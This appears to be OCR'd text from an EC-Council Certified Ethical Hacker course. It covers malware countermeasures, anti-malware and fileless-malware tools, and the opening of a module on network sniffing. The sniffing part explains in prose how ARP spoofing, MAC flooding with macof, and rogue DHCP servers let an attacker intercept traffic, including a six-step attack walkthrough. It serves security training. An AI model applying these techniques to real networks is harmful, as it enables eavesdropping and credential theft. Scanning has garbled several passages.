Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Ensure that the device has the auto-update software-related security patches.

=

Implement the pipeline emission analysis method to check and analyze hardware-based backdoors, which can be attached during the manufacturing process.

=

Avoid using hardware components obtained from untrusted shopping sites or black markets, which allow attackers to easily inject backdoor into the hardware.

=

If any abnormal behavior is detected, reconfigure it with new credentials.

=

Check for user ratings and reviews before installing and providing permissions to any product, even if it is downloaded from trusted sources.

Module 07 Page 1190

option enabled to keep it updated

restore

the

device

to factory

settings

with

and

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hac! king and Countermeasures MalwareTI hreats

Virus and Worm

Exam 312-50 Certified Ethical Hacker

Countermeasures

|

Install antivirus software and update it regularly

Regularly maintain data backup

Generate distribute anit toantivirus the staffpolicy for safe computing and

Stay informed about the latest virus threats

Schedule regular scans for all drives after the installation

Ensure the pop-up blockers are enabled and use an

Pay attention to the instructions while downloading

Perform disk clean-up and run a registry scanner once a week

Avoid opening attachments received from unknown senders, as viruses spread via email attachments

Run anti-spyware or anti-adware once a week Pywi

Do not accept disks or programs without checking them first using a current version of an antivirus program

Do not open files with more than one file type extension

of antivirus software

Internet firewall

files or any programs from the Internet

Virus and Worm Countermeasures Some countermeasures against viruses and worms are as follows:

Install antivirus software that detects and removes infections as they occur. Generate an antivirus policy for safe computing and distribute it to the staff. Pay attention to the instructions while downloading files or programs from the Internet. Regularly update antivirus software. Avoid opening attachments received from unknown senders, as viruses spread via email

attachments.

Since virus infections can corrupt data, perform regular data backups. Schedule regular scans for all drives after the installation of antivirus software. Do not accept disks or programs without checking them using the current version of an antivirus program.

Ensure that any executable code used within the organization has been approved. Do not boot the machine with an infected bootable system disk. Stay informed about the latest virus threats. Check DVDs for virus infection. Ensure that pop-up blockers are enabled and use an Internet firewall. Perform disk clean-up and run a registry scanner once a week. Run anti-spyware or anti-adware once a week. Module 07 Page 1191

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Do not open files with more than one file type extension.

=

Exercise caution with files sent through instant messaging applications.

=

Perform regular checkups on installed programs and stored data.

=

Employ an effective email filter and scan emails on a regular basis.

Module 07 Page 1192

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Fileless Malware Countermeasures Remove all the administrative tools and restrict access through Windows Group Policy or Windows AppLocker

Implement two-factor authentication to access critical systems or resources connected to the network

Disable PowerShell and WMI when not in use

Implement multi-layer security to detect and defend é

Disable macros and use only digitally signed, trusted macros

Run periodic antivirus scans to detect infections and keep antivirus program updated

against memory-resident malware

Install whitelisting solutions such as McAfee Application Controlto block unauthorized applications and code

6

|

CEH

running on the systems

Install browser protection tools and disable automatic plugin downloads

Train employees toAaadetect phishing emails and to never Cee eh

Regularly update and patch applications and OS

Disable PDF readers to run JavaScript automatically

Use NGAV software that employs advanced technology such as Al/ML to prevent new polymorphic malware $s Reserved. Reproduction

Fileless Malware

Countermeasures

Some countermeasures against fileless malware attacks are as follows: =

Remove all the administrative tools and restrict access through Windows Group Policy or Windows AppLocker.

=

Disable PowerShell and WMI when not in use.

=

Disable macros and use only digitally signed, trusted macros.

=

Install whitelisting solutions such as McAfee Application Control to block unauthorized applications and code running on the systems.

=

Train employees to detect phishing emails and to never enable documents.

=

Disable PDF readers to run JavaScript automatically.

=

Disable Flash in the browser settings.

=

Implement two-factor authentication to access critical systems or resources connected to the network.

=

Implement multi-layer security to detect and defend against memory-resident malware.

=

Use user behavior analytics (UBA) solutions to detect threats hidden within the data.

=

Ensure the ability to detect system tools such as PowerShell and whitelisted application scripts to protect against malicious attacks.

=

Run periodic updated.

Module 07 Page 1193 :

antivirus

scans

to

detect

infections

and

keep

macros

the

in MS Office

WMIC antivirus

as well as program

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Install browser protection tools and disable automatic plugin downloads.

=

Schedule regular security checks for applications and regularly patch the applications.

=

Regularly update the OS with the latest security patches.

=

Examine all the running programs for any malicious or new signatures and heuristics.

=

Enable endpoint security with active monitoring to protect networks when remotely.

=

Examine the indicators of compromise (loCs) on the system and network.

=

Regularly check the security logs, especially when excessive amounts of data leave the network.

=

Restrict admin rights and provide privilege escalation attacks.

=

Use application control to prevent Internet browsers from spawning script interpreters such as PowerShell and WMIC.

=

Carefully examine the changes in the system’s behavior patterns with respect to the baselines.

=

Use next-generation antivirus (NGAV) software that employs advanced technology such as machine learning (ML) and artificial intelligence (Al) to prevent new polymorphic malware.

=

Use baseline and search for known tactics, techniques, and procedures (TTPs) used by many adversarial groups.

=

Use managed detection and response (MDR) services that can perform threat hunting.

=

Use tools such as Blackberry Cylance and Toolkit (EMET) to combat fileless attacks.

=

Disable unused or unnecessary applications and service features.

=

Uninstall applications that are not important.

=

Block all the incoming network traffic or files with the .exe format.

=

Check if any PowerShell scripts are masked in any of the drives or in the \TEMP folder.

=

Utilize projects such as AItFS, which provides insights into how fileless malware usually works on targeted devices.

Module 07 Page 1194

the

least privileges to the

Microsoft

Enhanced

user

accessed

level to prevent

Mitigation

Experience

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CEH

LO#08: Demonstrate the Use of Anti-Malware Software

Copright © by

Anti-Malware Software An attacker uses malware to commit online fraud or theft. Thus, the use of anti-malware software is recommended to help detect malware, remove it, and repair any damage it might cause. This section lists and describes various anti-malware (anti-Trojan and antivirus) software

programs.

Module 07 Page 1195 :

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

CEH

Anti-Trojan Software Kaspersky Internet Security

Kaspersky Internet Security provides protection against Trojans, viruses, spyware, ransomware, phishing, and dangerous websites

Norton 360 Premium (https://us.norton.com) Bitdefender Total Security (https://bitdefender.com) HitmanPro (https://www. hitmanpro.com)

Internet Security

Malwarebytes Premium (https://www.malwarebytes.com)

Device is protected > ©

McAfee® LiveSafe™ (https://www.mcafee.com)

&

fstTinePrcton

Tater

C)

®

Zemana Antimalware (https://www.zemana.com) 9

sete

°

Emsisoft Anti-Malware Home

(https://www.emsisoft.com)

Malicious Software Removal Tool

(https://www. microsoft.com)

‘SUPERAntiSpyware (https://www.superantispyware.com) Plumbytes Anti-Malware (https://plumbytes.com)

Anti-Trojan Software Anti-Trojan software is a tool or program that is designed to identify and prevent malicious Trojans or malware from infecting computer systems or electronic devices. Anti-Trojan tools may employ scanning strategies as well as freeware or licensed tools to detect Trojans, rootkits, backdoors, and other types of potentially damaging software.

Module 07 Page 1196

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohib

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

Kaspersky Internet Security

Source: https://www.kaspersky.com Kaspersky Internet Security protects devices from various types of intrusions due to Trojans, viruses, spyware, ransomware, phishing, and dangerous websites. It securely stores passwords for easy access on PC, Mac, and mobile. It makes backup copies of photos, music, and files and also encrypts data on PC. Furthermore, it automatically blocks inappropriate content and helps you manage the use of social networks. In addition, it provides extra security when you shop or bank online on PC or Mac.

Kaspersky

Internet Security

Device is protected >

©

&

®

Real-Time Protection

Call & Text Filter

Anti-Theft

i)

®

8

Text Anti:Phishing

Internet Protection

Privacy Protection

©

Figure 7.134: Screenshot of Kaspersky Internet Security

Some additional anti-Trojan software are as follows:

McAfee® LiveSafe™ (https://www.mcafee.com) Norton 360 Premium (https://us.norton.com) Bitdefender Total Security (https://bitdefender.com) HitmanPro (https://www.hitmanpro.com)

Malwarebytes (https://www.malwarebytes.org) Zemana Antimalware (https://www.zemana.com) Emsisoft Anti-Malware Home (https://www.emsisoft.com)

Malicious Software Removal Tool (https://www.microsoft.com) SUPERAntiSpyware (https://www.superantispyware.com)

Plumbytes Anti-Malware (https://plumbytes.com) Module 07 Page 1197

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

CEH

Antivirus Software Bitdefender Antivirus Plus

Bitdefender Antivirus Plus works against all threats — from viruses, worms and Trojans, to ransomware, zero-day exploits, rootkits and spyware

You are safe

@ ClamWin (https://www.clamwin.com) © Kaspersky Anti-Virus (https://www.kaspersky.com) @ McAfee AntiVirus Plus (https://www.mcafee.com) ©

Norton AntiVirus Plus (https://us.norton.com)

©

Avast Premier Antivirus (https://www.avast.com)

© ESET Internet Security (https://www.eset.com) @

ttps//wnwbtdefender.com

AVG Antivirus FREE (https://free.avg.com)

© Avira Antivirus Pro (https://www.avira.com) © Trend Micro Maximum Security (https://www.trendmicro.com) @ Panda Total protection (https://www. pandasecurity.com) @ Webroot SecureAnywhere Antivirus (https://www.webroot.com)

Antivirus Software It is essential to update antivirus tools to monitor the data passing through a system. Such tools may follow specific or generic methods to detect viruses. Generic methods look for virus-like performance rather than a specific virus. These tools do not specify the virus type but warn the user of a possible virus infection. Generic methods can raise false alarms; hence, they do not perform well in terms of detecting precise virus forms. Specific methods look for known virus signatures in the antivirus database and ask the user to choose the necessary action to be taken, such as repair and delete. It is a good practice for organizations to install the most recent version of the antivirus software and regularly update it to keep up with the introduction of new viruses in the market. Updating of antivirus software by the respective vendors is a continuous process. =

Bitdefender Antivirus Plus Source: https://www. bitdefender.com Bitdefender Antivirus Plus works against all threats, from viruses, worms, and Trojans to ransomware, zero-day exploits, rootkits, and spyware. It uses a technique called behavioral detection to closely monitor active apps. As soon as it detects suspicious activity, it takes decisive action to prevent infection. It sniffs and blocks malicious websites that masquerade as trustworthy websites to steal financial data such as passwords or credit card numbers.

Module 07 Page 1198

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

B sisetenserseivius Fis

v

You are safe a

VULNERABILITY RECOMMENDATION @

som

Ss

ws accounts Ii essed by an intrude

and run the

Dashboard

QUICK SCAN

Bo"

us

{a Sstepay

Figure 7.135: Screenshot of Bitdefender Antivirus Plus

Some additional antivirus software are as follows:

=

ClamWin (https://www.clamwin.com)

=

Kaspersky Anti-Virus (https://www.kaspersky.com)

=

McAfee AntiVirus Plus (https://home.mcafee.com)

=

Norton AntiVirus Plus (https://us.norton.com)

=

Avast Premier Antivirus (https://www.avast.com)

=

ESET Internet Security (https://www.eset.com)

=

AVG Antivirus FREE (https://free.avg.com)

=

Avira Antivirus Pro (https://www.avira.com)

=

Trend Micro Maximum Security (https://trendmicro.com)

=

Panda Total protection (https://www.pandasecurity.com)

=

Webroot SecureAnywhere Antivirus (https://www.webroot.com)

Module 07 Page 1199 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Fileless Malware Detection Tools . AlienVault® Anywhere™USM

|

CE H

AlienVault® USM Anywhere™ providesa single unified and 3tform for threat detection, incidentresponse,

compliance management

Ao

ba 120..

299.,



; | Quick Heal Total Security meps://uvon.quckeal com Endpoint Detection and Response (EDR)

‘https://wrww.trendmicro.com

Defender Check ‘ttps://athutscom FCL ‘ttps://athutscom

1 Tips eyborsccurty ott com

CYNET 360 ttp://wnow.cynet.com

Fileless Malware Detection Tools Various tools used to detect fileless malware discussed below: =

threats on endpoint devices and systems

are

AlienVault® USM Anywhere™ Source: https://cybersecurity.att.com

AlienVault® USM Anywhere™ provides a unified platform for threat detection, incident response, and compliance management. It centralizes security monitoring of networks and devices in the cloud, on premises, and at remote locations, thereby helping you to detect threats virtually anywhere.

Module 07 Page 1200

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Figure 7.136: Screenshot of AlienVault® USM Anywhere™

Some additional tools for detecting fileless malware threats are as follows:

=

Quick Heal Total Security (https://www.quickheal.com)

=

Endpoint Detection and Response (EDR) (https://www.trendmicro.com)

=

Defender Check (https://github.com)

=

FCL (https://github.com)

=

CYNET 360 (https://www.cynet.com)

Module 07 Page 1201 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Fileless Malware Protection Tools

CE H

Microsoft Defender for Endpoint

Kaspersky End Point Security

for Business

@ Microsoft Defender for Endpointis an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats

tps fw kaspersky com

:

-

Trend Micro Smart Protection

Suites ‘ttps://wa:trendmicro.com Exposure level: Medium (60) 68 active security recommendations 47 installed software 335 discovered vulnerabilities

&

Norton 360 with LifeLock Select ‘etps://s.norton.com REVE Antivirus ‘etps://wu.reveontviis.com

BlackBerry Spark Suites -tps:/ ww blackberry com Tips Jac micros com

Fileless Malware Protection Tools Various tools used to protect systems, networks, and other devices connected to the network from fileless malware threats are discussed below:

=

Microsoft Defender for Endpoint Source: https://docs.microsoft.com Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats. It can inspect fileless threats even with heavy obfuscation. The machine learning technologies used in the cloud provide protections against new and emerging threats.

Module 07 Page 1202

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

1 logged on user

Exposure level: Medium (60) 68 active security recommendations

47 installed software 335 discovered vulnerabilities

Figure 7.137: Screenshot of Microsoft Defender for Endpoint

Some additional fileless malware protection tools are as follows: =

Kaspersky End Point Security for Business (https://www.kaspersky.com)

=

Trend Micro Smart Protection Suites (https://www.trendmicro.com)

=

Norton 360 with LifeLock Select (https://us.norton.com)

=

REVE Antivirus (https://www.reveantivirus.com)

=

BlackBerry Spark Suites (https://www.blackberry.com)

Module 07 Page 1203 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

Module Summary Q

=

CE H

In this module, we discussed the following:

> >

>

Concepts of malware and malware propagation techniques Concepts of Potentially unwanted applications (PUAs) and adware Concepts of APT and its lifecycle

Concepts of Trojans, their types, and how they infect systems Concepts of viruses, their types, and how they infect files along with the concept of computer worms

Concepts of fileless malware and how they infect files How to perform static and dynamic malware analysis and explained different techniques to detect malware

Various Trojan, backdoor, virus, and worm countermeasures Various Anti-Trojan and Antivirus tools

Inthe next module, we will discussin detail how attackers as well as ethical hackers and pen testers perform sniffing to collect information on a target of evaluation

Module Summary This module presented the concepts of malware and malware propagation techniques. It explained potentially unwanted applications (PUAs) and adware. It also discussed the concepts of APT and its lifecycle. Furthermore, it described the concepts of Trojans, their types, and how they infect systems. In addition, it described the concepts of viruses, their types, and how they infect files. Next, it discussed the concepts of computer worms. Moreover, it explained the concepts of fileless malware and how it infects files. It further demonstrated static and dynamic malware analysis and described various techniques to detect malware. This module also presented various measures against Trojans, backdoors, viruses, and worms. Finally, the module ended with a detailed discussion on various anti-Trojan and antivirus tools. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform sniffing to collect information on a target of evaluation.

Module 07 Page 1204

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

C\EH

EC-Council

Certified |) Ethical Hacker

MODULE 08 SNIFFING

EC-COUNCIL OFFICIAL CURRICULA

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Sniffing

CEH

LEARNING

OBJECTIVES

LO#01: Summarize Sniffing Concepts

©

LO#03: Use Sniffing Tools

LO#02: Demonstrate Different Sniffing Techniques

©

LO#04: Explain Sniffing Countermeasures

Strictly Prohibited

Learning Objectives This module starts with an overview of sniffing concepts and provides an insight into MAC, DHCP, ARP, MAC spoofing, and DNS poisoning attacks. Later, the module discusses various sniffing tools, countermeasures, and detection techniques. At the end of this module, you will be able to: Describe sniffing concepts Explain different MAC attacks Explain different DHCP attacks Describe ARP poisoning Explain different spoofing attacks Describe DNS poisoning Apply a defense mechanism against various sniffing techniques Use different sniffing tools Apply various sniffing countermeasures Apply various techniques to detect sniffing attacks

Module 08 Page 1207

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

CEH

LO#01: Summarize Sniffing Concepts

Strictly Prohibited

Sniffing Concepts This section describes network sniffing and threats, how a sniffer works, active and passive sniffing, how an attacker hacks a network using sniffers, protocols vulnerable to sniffing, sniffing in the data link layer of the Open Systems Interconnection (OSI) model, hardware protocol analyzers, Switched Port Analyzer (SPAN) ports, wiretapping, and lawful interception.

Module 08 Page 1208

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Network Sniffing

CEH

Packet Sniffing ‘@

How a Sniffer

Packet sniffing is the process of monitoring and

‘©

capturing all data packets passing through a given network using a software application or hardware

Works

Asniffer turns the NIC of a system to the promiscuous mode so that it listens to all the data transmitted on its segment

device ‘@

Itallows an attacker to observe and access the entire network traffic from a given point

©

Packet sniffing allows an attacker to gather

Attacker PC running NIC Card in Promiscuous Mode

sensitive information such as Telnet passwords,

email traffic, syslog traffic, router configuration, web traffic, DNS traffic, FTP passwords, chat sessions, and account information

Network Sniffing Packet sniffing is the process of monitoring and capturing all data packets passing through a given network using a software application or hardware device. Sniffing is straightforward in hub-based networks, as the traffic on a segment passes through all the hosts associated with that

segment.

However,

most

networks

today

work

on

switches.

A switch

is an

advanced

computer networking device. The major difference between a hub and a switch is that a hub transmits line data to each port on the machine and has no line mapping, whereas a switch looks at the Media Access Control (MAC) address associated with each frame passing through it and sends the data to the required port. A MAC address is a hardware address that uniquely identifies each node of a network. An attacker needs to manipulate the functionality of the switch to see all the traffic passing through it. A packet sniffing program (also known as a sniffer) can capture data packets only from within a given subnet, which means that it cannot sniff packets from another network. Often, any laptop can plug into a network and gain access to it. Many enterprises’ switch ports are open. A packet sniffer placed on a network in promiscuous mode can therefore capture and analyze all the network traffic. Sniffing programs turn off the filter employed by Ethernet network interface cards (NICs) to prevent the host machine from seeing other stations’ traffic. Thus, sniffing programs can monitor all traffic. Although most networks today employ switch technology, packet sniffing is still useful. This is because installing remote sniffing programs on network components with heavy traffic flows such as servers and routers is relatively easy. It allows an attacker to observe and access the entire network traffic from one point. Packet sniffers can capture data packets containing sensitive information such as passwords, account information, syslog traffic, router configuration, DNS traffic, email traffic, web traffic, chat sessions, and FTP passwords. This Module 08 Page 1209

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

allows an attacker to read passwords in cleartext, the actual emails, credit card numbers, financial transactions, etc. It also allows an attacker to sniff SMTP, POP, IMAP traffic, IMAP, HTTP Basic, telnet authentication, SQL database, SMB, NFS, and FTP traffic. An attacker can gain a substantial amount of information by reading captured data packets; then, the attacker can use that information to break into the network. An attacker carries out more effective attacks by combining these techniques with active transmission.

The following diagram network users:

depicts an attacker sniffing the data packets between

two

legitimate

Copy of data passing through the switch

Attacker Figure 8.1: Packet sniffing scenario

How a Sniffer Works The most common way of networking computers is through an Ethernet connection. A computer connected to a local area network (LAN) has two addresses: a MAC address and an Internet Protocol (IP) address. A MAC address uniquely identifies each node in a network and is stored on the NIC itself. The Ethernet protocol uses the MAC address to transfer data to and from a system while building data frames. The data link layer of the OSI model uses an Ethernet header with the MAC address of the destination machine instead of the IP address. The network layer is responsible for mapping IP network addresses to the MAC address as required by the data link protocol. It initially looks for the MAC address of the destination machine in a table, usually called the Address Resolution Protocol (ARP) cache. If there is no entry for the IP address, an ARP broadcast of a request packet goes out to all machines on the local subnetwork. The machine with that particular address responds to the source machine with its MAC address. The source machine’s ARP cache adds this MAC address to the table. The source machine, in all its communications with the destination machine, then uses this MAC address. There

are two

basic types

These two types are: =

of Ethernet

environments,

and

sniffers work

differently

in each.

Shared Ethernet In a shared Ethernet environment, a single bus connects all the hosts that compete for bandwidth. In this environment, all the other machines receive packets meant for one machine. Thus, when machine 1 wants to talk to machine 2, it sends a packet out on the network with the destination MAC address of machine 2, along with its own source MAC address. The other machines in the shared Ethernet (machines 3 and 4) compare the

Module 08 Page 1210

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

frame’s destination MAC address with their own and discard the unmatched frame. However, a machine running a sniffer ignores this rule and accepts all the frames. Sniffing in a shared Ethernet environment is passive and, hence, difficult to detect. =

Switched Ethernet In a switched Ethernet environment, the hosts connect with a switch instead of a hub. The switch maintains a table that tracks each computer’s MAC address and the physical port on which that MAC address is connected, and then delivers packets destined for a particular machine. The switch is a device that sends packets to the destined computer only; furthermore, it does not broadcast them to all the computers on the network. This results in better utilization of the available bandwidth and improved security. Hence, the process of putting a machine NIC into promiscuous mode to gather packets does not work. As a result, many people think that switched networks are secure and immune to sniffing. However, this is not true.

Although a switch following methods: =

is more

secure

than

a hub,

sniffing the

network

is possible

using the

ARP Spoofing ARP is stateless. A machine can send an ARP reply even without asking for it; furthermore, it can accept such a reply. When a machine wants to sniff the traffic originating from another system, it can ARP spoof the gateway of the network. The ARP cache of the target machine will have an incorrect entry for the gateway. Thus, all the traffic destined to pass through the gateway will now pass through the machine that spoofed the gateway MAC address.

=

MAC Flooding Switches maintain a translation table that maps various MAC addresses to the physical ports on the switch. As a result, they can intelligently route packets from one host to another. However, switches have a limited memory. MAC flooding makes use of this limitation to bombard switches with fake MAC addresses until the switches can no longer keep up. Once this happens to a switch, it will enter fail-open mode, wherein it starts acting as a hub by broadcasting packets to all the ports on the switch. Once that happens, it becomes easy to perform sniffing. macof is a utility that comes with the dsniff suite and helps the attacker to perform MAC flooding.

Once a switch turns into a hub, it starts broadcasting all packets it receives to all the computers in the network. By default, promiscuous mode is turned off in network machines; therefore, the

NICs accept only those packets that are addressed to a user’s machine and discard the packets sent to the other machines. A sniffer turns the NIC of a system to promiscuous mode so that it listens to all the data transmitted on its segment. A sniffer can constantly monitor all the network traffic to a computer through the NIC by decoding the information encapsulated in the data packets. Attackers configure the NIC in their machines to run in promiscuous mode so that the card starts accepting all the packets. Thus, the attacker can view all the packets that are being transmitted in the network.

Module 08 Page 1211

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Attacker PC running NIC Card in

Promiscuous Mode

switch to behave as a hub

Internet

Figure 8.2: Working of a sniffer

Module 08 Page 1212

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Types of Sniffing

\EH

sees . Sniffing Passive

||

—_____ ] | @ Passive sniffingrefers to sniffingthrougha hub, the traffic is sent to all ports wherein ] packets sent by others without | @ Itinvolvesmonitoring | sendingany additional data packets in the network traffic

]

@ Ina network thatuses hubs to connect systems, all hostson the network cansee the all traffic, and

| |

can easily capture traffic going the attacker therefore,

]

| ] ]] ]] ]] ]] ]]

through the hub

‘© Hub usage is an outdated approach. Most modern

networks now use switches

pes

Attacker Hub LAN Note: Passive sniffing provides significant stealth advantages over active sniffing

.

sees

Active Sniffing

—__— @ Active sniffingis used to sniffa switch-based network Resolution injecting Address ves @ Active sniffinginvol the switch’s Packets (ARP) into the network to flood Memory (CAM) table, which keeps Content Addressable track of host-port connections

Active Sniffing Techniques

MAC Flooding

DHCP Attacks

DNS Poisoning

Switch Port Stealing

ARP Poisoning

Spoofing Attack

Types of Sniffing Attackers run sniffers to convert the host system’s NIC to promiscuous mode. As discussed earlier, the NIC in promiscuous mode can then capture packets addressed to the specific network.

There are two types of sniffing. Each is used for different types of networks. The two types are: =

Passive sniffing

=

Active sniffing

Passive Sniffing Passive sniffing involves sending no packets. It simply captures and monitors the packets flowing in the network. A packet sniffer alone is not preferred for an attack because it works only in a common collision domain. A common collision domain is the sector of the network that is not switched or bridged (i.e., connected through a hub). Common collision domains are present in hub environments. A network that uses hubs to connect systems uses passive sniffing. In such networks, all hosts in the network can see all the traffic. Hence, it is easy to capture traffic through the hub using passive sniffing.

Figure 8.3: Passive sniffing

Module 08 Page 1213

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

Attackers use the following passive sniffing methods to gain control over a target network: =

Compromising physical security: An attacker who succeeds in compromising the physical security of a target organization can walk into the organization with a laptop and try to plug into the network and capture sensitive information about the organization.

=

Using a Trojan horse: Most Trojans have in-built sniffing capability. An attacker can install these on a victim’s machine to compromise it. After compromising the victim’s machine, the attacker can install a packet sniffer and perform sniffing.

Most modern networks use switches instead of hubs. A switch eliminates the risk of passive sniffing. However, a switch is still vulnerable to active sniffing. Note: Passive sniffing provides significant stealth advantages over active sniffing. Active Sniffing Active sniffing searches for traffic on a switched LAN by actively injecting traffic into it. Active sniffing also refers to sniffing through a switch. In active sniffing, the switched Ethernet does not transmit information to all the systems connected through LAN as it does in a hub-based network. For this reason, a passive sniffer is unable to sniff data on a switched network. It is easy to detect these sniffer programs and highly difficult to perform this type of sniffing. Switches examine data packets for source and destination addresses and then transmit them to the appropriate destinations. Therefore, it is cumbersome to sniff switches. However, attackers can actively inject ARP traffic into a LAN to sniff around a switched network and capture the traffic. Switches maintain their own ARP cache in Content Addressable Memory (CAM). CAM is a special type of memory that maintains a record of which host is connected to which port. A sniffer records all the information visible on the network for future review. An attacker can see all the information in the packets, including data that should remain hidden. To summarize the types of sniffing: passive sniffing does not send any packets; it only monitors the packets sent by others. Active sniffing involves sending out multiple network probes to identify access points. The following is a list of different active sniffing techniques: =

MAC flooding

=

DNS poisoning

=

ARP poisoning

=

DHCP attacks

=

Switch port stealing

=

Spoofing attack

Module 08 Page 1214

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing

Exam 312-50 Certified Ethical Hacker

How an Attacker Hacks the Network Using Sniffers

C | EH

He/she runs discovery tools to learn about network topology

An attacker connects his desktop/laptop to a switch port

ee a He/she identifies a victim’s machine to target his/her attacks

He/she poisons the victim’s machine by using ARP spoofing techniques

@

>=

The hacker extracts passwords and sensitive data from the redirected traffic

The traffic destined for the victim's machine is redirected to the attacker

How an Attacker Hacks the Network Using Sniffers Attackers use sniffing tools to sniff packets and monitor network traffic on a target network. The steps that an attacker follows to make use of sniffers to hack a network are illustrated below.

=

Step 1: An attacker who decides to hack a network first discovers the appropriate switch to access the network and connects a system or laptop to one of the ports on the switch.

ae eeeeeeeeeeeeseeseeesssssssD>

Figure 8.4: Discovering a switch to access the network

=

Step 2: An attacker who succeeds in connecting to the network tries to determine network information such as the topology of the network by using network discovery

tools.

seeeeeeeeeeseeesD,

re

1

ae

1

'

LJ

Figure 8.5: Using network discovery tools to learn topology

Module 08 Page 1215

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Sniffing =

Exam 312-50 Certified Ethical Hacker

Step 3: By analyzing the network topology, the attacker identifies the victim’s machine

to target his/her attacks.

Figure 8.6: Identifying the victim’s machine

=

Step 4: An attacker who identifies a target machine uses ARP spoofing techniques to send fake (spoofed) Address Resolution Protocol (ARP) messages.

>

GE

BY

Ge c MiTM

Figure 8.7: Attacker sending fake ARP messages

=

Step 5: The previous step helps the attacker to divert all the traffic from the victim’s computer to the attacker’s computer. This is a typical man-in-the-middle (MITM) type of attack.

Pa Figure 8.8: Redirecting the traffic to the attacker

=

Step 6: Now, the attacker can see all the data packets sent and received by the victim. The attacker can now extract sensitive information from the packets, such as passwords, usernames, credit card details, and PINs.

we


Attacker is the DNS server

tichea

Wrong IP Address> DoS with spoofed IP

Internet

Rogue Server Al Rights Reserved. Reprod

Rogue DHCP Server Attack In addition to DHCP starvation attacks, an attacker can perform MITM attacks such as sniffing. An attacker who succeeds in exhausting the DHCP server’s IP address space can set up a rogue DHCP server on the network, which is not under the control of the network administrator. The

rogue DHCP server impersonates a legitimate server and offers IP addresses and other network information to other clients in the network, acting as a default gateway. Clients connected to

the network with the addresses assigned by the rogue server will now become victims of MITM and other attacks, whereby packets forwarded from a client’s machine will reach the rogue server first.

In a rogue DHCP server attack, an attacker will introduce a rogue server into the network. This

